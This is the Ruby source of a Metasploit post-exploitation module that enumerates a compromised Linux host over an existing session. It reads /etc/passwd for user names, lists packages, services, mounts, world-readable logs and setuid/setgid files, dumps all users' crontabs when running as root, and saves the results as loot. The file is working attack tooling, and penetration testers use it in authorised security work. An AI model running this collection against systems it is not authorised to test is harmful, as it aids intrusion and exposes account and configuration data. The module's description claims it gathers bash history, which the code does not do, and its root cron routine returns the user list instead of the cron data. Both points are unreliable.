1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Linux Gather System and User Information',
15
        'Description' => %q{
16
          This module gathers system information. We collect
17
          installed packages, installed services, mount information,
18
          user list, user bash history and cron jobs
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services
23
          'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux
24
          'sinn3r', # Testing and modification of original enum_linux
25
          'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
26
          'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
27
        ],
28
        'Platform' => ['linux'],
29
        'SessionTypes' => ['shell', 'meterpreter'],
30
        'Notes' => {
31
          'Stability' => [CRASH_SAFE],
32
          'SideEffects' => [],
33
          'Reliability' => []
34
        }
35
      )
36
    )
37
  end
38

39
  def run
40
    distro = get_sysinfo
41
    store_loot(
42
      'linux.version',
43
      'text/plain',
44
      session,
45
      "Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
46
      'linux_info.txt',
47
      'Linux Version'
48
    )
49

50
    # Print the info
51
    print_good('Info:')
52
    print_good("\t#{distro[:version]}")
53
    print_good("\t#{distro[:kernel]}")
54

55
    users = execute('/bin/cat /etc/passwd | cut -d : -f 1')
56
    user = execute('/usr/bin/whoami')
57

58
    print_good("\tModule running as \"#{user}\" user")
59

60
    installed_pkg = get_packages(distro[:distro])
61
    installed_svc = get_services(distro[:distro])
62

63
    mount = execute('/bin/mount -l')
64
    crons = get_crons(users, user)
65
    diskspace = execute('/bin/df -ahT')
66
    disks = (mount + "\n\n" + diskspace)
67
    logfiles = execute('find /var/log -type f -perm -4 2> /dev/null')
68
    uidgid = execute('find / -xdev -type f -perm +6000 -perm -1 2> /dev/null || find / -xdev -type f -perm /6000 -perm -1 2> /dev/null')
69

70
    save('Linux version', distro)
71
    save('User accounts', users)
72
    save('Installed Packages', installed_pkg)
73
    save('Running Services', installed_svc)
74
    save('Cron jobs', crons)
75
    save('Disk info', disks)
76
    save('Logfiles', logfiles)
77
    save('Setuid/setgid files', uidgid)
78
    save('CPU Vulnerabilities', get_cpu_vulnerabilities)
79
  end
80

81
  def save(msg, data, ctype = 'text/plain')
82
    ltype = 'linux.enum.system'
83
    loot = store_loot(ltype, ctype, session, data, nil, msg)
84
    print_status("#{msg} stored in #{loot}")
85
  end
86

87
  def execute(cmd)
88
    vprint_status("Execute: #{cmd}")
89
    output = cmd_exec(cmd)
90
    output
91
  end
92

93
  def get_packages(distro)
94
    packages_installed = ''
95
    case distro
96
    when /fedora|redhat|suse|mandrake|oracle|amazon/
97
      packages_installed = execute('rpm -qa')
98
    when /slackware/
99
      packages_installed = execute('/bin/ls /var/log/packages')
100
    when /ubuntu|debian/
101
      packages_installed = execute('/usr/bin/dpkg -l')
102
    when /gentoo/
103
      packages_installed = execute('equery list')
104
    when /arch/
105
      packages_installed = execute('/usr/bin/pacman -Q')
106
    else
107
      print_error('Could not determine package manager to get list of installed packages')
108
    end
109
    packages_installed
110
  end
111

112
  def get_services(distro)
113
    services_installed = ''
114
    case distro
115
    when /fedora|redhat|suse|mandrake|oracle|amazon/
116
      services_installed = execute('/sbin/chkconfig --list')
117
    when /slackware/
118
      services_installed << "\nEnabled:\n*************************\n"
119
      services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
120
      services_installed << "\n\nDisabled:\n*************************\n"
121
      services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
122
    when /ubuntu|debian/
123
      services_installed = execute('/usr/sbin/service --status-all')
124
    when /gentoo/
125
      services_installed = execute('/bin/rc-status --all')
126
    when /arch/
127
      services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
128
    else
129
      print_error('Could not determine the Linux Distribution to get list of configured services')
130
    end
131
    services_installed
132
  end
133

134
  def get_cpu_vulnerabilities
135
    execute('grep -r . /sys/devices/system/cpu/vulnerabilities').to_s
136
  end
137

138
  def get_crons(users, user)
139
    if user == 'root' && users
140
      users = users.chomp.split
141
      users.each do |u|
142
        next unless u == 'root'
143

144
        vprint_status('Enumerating as root')
145
        cron_data = ''
146
        users.each do |usr|
147
          cron_data << "*****Listing cron jobs for #{usr}*****\n"
148
          cron_data << execute("crontab -u #{usr} -l") + "\n\n"
149
        end
150
      end
151
    else
152
      vprint_status("Enumerating as #{user}")
153
      cron_data = "***** Listing cron jobs for #{user} *****\n\n"
154
      cron_data << execute('crontab -l')
155

156
      # Save cron data to loot
157
      cron_data
158
    end
159
  end
160
end
161

162